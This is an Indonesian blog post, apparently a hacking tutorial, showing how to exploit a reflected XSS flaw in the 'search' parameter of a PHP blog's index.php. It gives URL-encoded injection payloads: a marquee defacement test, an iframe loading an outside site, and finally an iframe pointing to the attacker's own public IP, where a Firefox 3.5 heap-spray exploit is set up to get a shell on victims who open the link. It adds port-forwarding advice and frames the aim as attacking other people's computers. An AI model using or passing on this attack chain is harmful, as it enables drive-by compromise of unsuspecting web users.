Disini penulis mencontohkan celah keamanan pada CMS Blog PHP yang memiliki celah keamanan XSS pada variabel search di index.php.
http://situsblogphp.com
Di tes file index.php dengan variabel search di masukkan inputan kode html.
http://situsblogphp.com/index.php?search=%22%3E%3C/title%3E%3Cmarquee%20bgcolor=%22red%22%3E%3CH2%3EKurniawan%20ganteng%3C/H2%3E%3C/marquee%3E
Hasilnya :
Setelah mengetahui site memiliki bug XSS maka kita dapat memanipulasinya lebih jauh dengan memanfaatkan iframe untuk menyerang komputer orang lain yang membuka URL yang kita miliki.
Contoh memanfaatkan IFRAME untuk XSS untuk membuka site Yogyafree X-code.
http://situsblogphp.com/index.php?search=%22%3E%3C/TITLE%3E%3CIFRAME%20src=http://xcode.or.id%3E%3CIFRAME%3E
Binggo, ternyata tampil bagian dari site Yogyafree X-code. Untuk PoC-nya maka kita aktifkan exploit yang dapat menyebabkan target jika membuka suatu URL maka kita dimungkinkan untuk mendapatkan shell pada komputer target yang dikarenakan bisa dari celah keamanan browser, celah keamanan pembuka document yang terintegrasi dengan browser dan sebagainya.
Disini contohnya celah keamanan Heap Spray pada Mozilla Firefox 3.5. Pastikan IP kita adalah IP Publik, jika kita menggunakan koneksi speedy dengan router modem yang di share koneksinya maka anda dapat memanfaatkan port forwarding yang dimana diarahkan ke IP lokal komputer kita.
Contoh mengaktifkan exploit firefox di komputer kita :
Setelah kita mengaktifkan exploit kita maka kita tinggal memasukkan IP publik kita yang misal contohnya 180.252.132.168 dilakukan penggabungan dengan URL, hasilnya dapat sebagai berikut :
http://situsblogphp.com/index.php?search=%22%3E%3C/TITLE%3E%3CIFRAME%20src=http://180.252.132.168%3E%3CIFRAME%3E
Jika target menggunakan Mozilla Firefox 3.5 dan terus memaksa untuk membuka URL tersebut maka anda dapat menebak kemungkinan hasil dari akibat tindakan tersebut.
0 komentar:
Posting Komentar